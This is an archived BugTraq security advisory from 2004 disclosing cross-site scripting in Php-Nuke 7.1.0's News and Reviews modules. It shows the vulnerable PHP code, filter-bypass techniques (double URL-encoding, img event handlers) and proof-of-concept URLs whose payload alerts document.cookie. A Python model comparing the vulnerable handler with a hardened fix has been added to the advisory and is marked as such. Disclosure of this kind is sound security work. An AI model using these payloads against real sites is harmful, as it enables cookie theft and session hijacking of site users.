BugTraq
[waraxe-2004-SA#002] - Cross-Site Scripting (XSS) in Php-Nuke 7.1.0 Feb 08 2004 08:13PM
Janek Vind (come2waraxe yahoo com)


{================================================================================}
{                            [waraxe-2004-SA#002]                                 }
{================================================================================}
{                                                                                }
{              [ Cross-Site Scripting (XSS) in Php-Nuke 7.1.0 ]                  }
{                                                                                }
{================================================================================}

Author: Janek Vind "waraxe"

Date: 08 Feb 2004

Location: Estonia, Tartu

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management system (CMS), written in PHP by
Francisco Burzi. It is used on many thousands of websites because it is free of
charge, easy to install and has a broad set of features.

Homepage: http://phpnuke.org

Vulnerabilities:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Looking at Php-Nuke's history, one finds many reports of XSS in Php-Nuke. Most of
them have been fixed by now, with version 7.1.0 already available. Despite this,
I found two new cases of XSS in Php-Nuke 6.x-7.1.0, and possibly in older
versions too.

Exploit:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's look at the code in "/modules/News/friend.php", lines 84-92 (Php-Nuke 7.1.0):

function StorySent($title, $fname) {
    include ("header.php");
    // PHP has already URL-decoded $title and $fname once when filling $_GET/$_POST;
    // this second urldecode() is what turns a "%3c" that slipped past the filter into "<"
    $title = urldecode($title);
    $fname = urldecode($fname);
    OpenTable();
    // both values are echoed into the page without htmlspecialchars() -> XSS
    echo "<center><font class=\"content\">"._FSTORY." <b>$title</b> "._HASSENT." $fname... "._THANKS."</font></center>";
    CloseTable();
    include ("footer.php");
}

If $title or $fname is supplied as a GET or POST variable, the value is echoed into
the page unescaped, so we have an XSS condition here. Php-Nuke does reject GET and
POST requests that contain a <script> tag, but that filter is easy to evade. One way
is to use an event handler on some other tag, such as <img src=foo onload=[code here]>
(with a src that does not load it is the onerror handler that fires, not onload).

A better way to exploit the XSS is to send the script partially or fully
URL-encoded ("hexed") a second time. The web server and PHP decode the request
once before the filter sees it, so "%253cscript" reaches the filter as
"%3cscript", which does not match the "<script>" pattern. Because the original
code then runs

$title = urldecode($title);

and

$fname = urldecode($fname);

the value is decoded once more and the literal <script> tag ends up in the page.

The "Reviews" module has the same problem.

Proof of concept examples:

http://f00bar.com/modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>

http://f00bar.com/modules.php?name=Reviews&rop=postcomment&title=%253cscript>alert%2528document.cookie);%253c/script>
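The following Python model of the request path is an added example; it is not code from this advisory or from Php-Nuke. It assumes that the global filter is a case-insensitive "<script" substring match over the once-decoded GET values (the advisory only says such requests are rejected) and replaces the _FSTORY, _HASSENT and _THANKS language constants with plain English text; the query strings are constructed to match the shape of the proof-of-concept URLs above. It shows why the double-encoded payload passes the filter while the single-encoded one is rejected, why an <img onerror> payload passes even single-encoded, and contrasts the vulnerable StorySent() behaviour with a hardened version that drops the second urldecode() and escapes before echoing.

```python
# Added example: models the Php-Nuke friend.php request flow (not project code).
import html
from urllib.parse import unquote_plus

# Constructed query strings, same shape as the PoC URLs in this advisory.
POC_DOUBLE_ENCODED = ("name=News&file=friend&op=StorySent"
                      "&title=%253cscript>alert%2528document.cookie);%253c/script>"
                      "&fname=bob")
POC_SINGLE_ENCODED = ("name=News&file=friend&op=StorySent"
                      "&title=%3cscript>alert(document.cookie);%3c/script>"
                      "&fname=bob")
POC_IMG_HANDLER = ("name=News&file=friend&op=StorySent"
                   "&title=%3cimg+src=foo+onerror=alert(1)>")


def parse_query(query):
    """Decode a query string exactly once, as PHP does when it fills $_GET."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def request_is_blocked(params):
    """Stand-in (assumption) for Php-Nuke's global GET/POST filter:
    reject the request if any once-decoded value contains '<script'."""
    return any("<script" in value.lower() for value in params.values())


def story_sent_vulnerable(title, fname):
    """Mirrors StorySent() in friend.php: a second urldecode(), then a raw echo."""
    title = unquote_plus(title)   # the second decode turns %3c back into <
    fname = unquote_plus(fname)
    return ('<center><font class="content">Story <b>%s</b> has been sent to %s... '
            'Thanks</font></center>' % (title, fname))


def story_sent_hardened(title, fname):
    """Fix: no second decode, and htmlspecialchars()-style escaping before echo."""
    return ('<center><font class="content">Story <b>%s</b> has been sent to %s... '
            'Thanks</font></center>' % (html.escape(title, quote=True),
                                        html.escape(fname, quote=True)))


def render(query, handler):
    """Run the filter, then the module handler; None means the request was rejected."""
    params = parse_query(query)
    if request_is_blocked(params):
        return None
    return handler(params.get("title", ""), params.get("fname", ""))


if __name__ == "__main__":
    for label, query in (("double-encoded", POC_DOUBLE_ENCODED),
                         ("single-encoded", POC_SINGLE_ENCODED),
                         ("img onerror   ", POC_IMG_HANDLER)):
        print(label, "vulnerable:", render(query, story_sent_vulnerable))
        print(label, "hardened:  ", render(query, story_sent_hardened))
```

The hardened version is the fix that applies to the Reviews module as well: never urldecode() a value PHP has already decoded, and pass every parameter that is echoed through htmlspecialchars(). Note that escaping alone would already defuse the payload; removing the second decode additionally stops the filter bypass, since what the filter saw is then what gets rendered.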

Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ulljobu, djzone, raider and to all white-, gray-, and blackhats in Estonia!

Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe (at) yahoo (dot) com

Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------
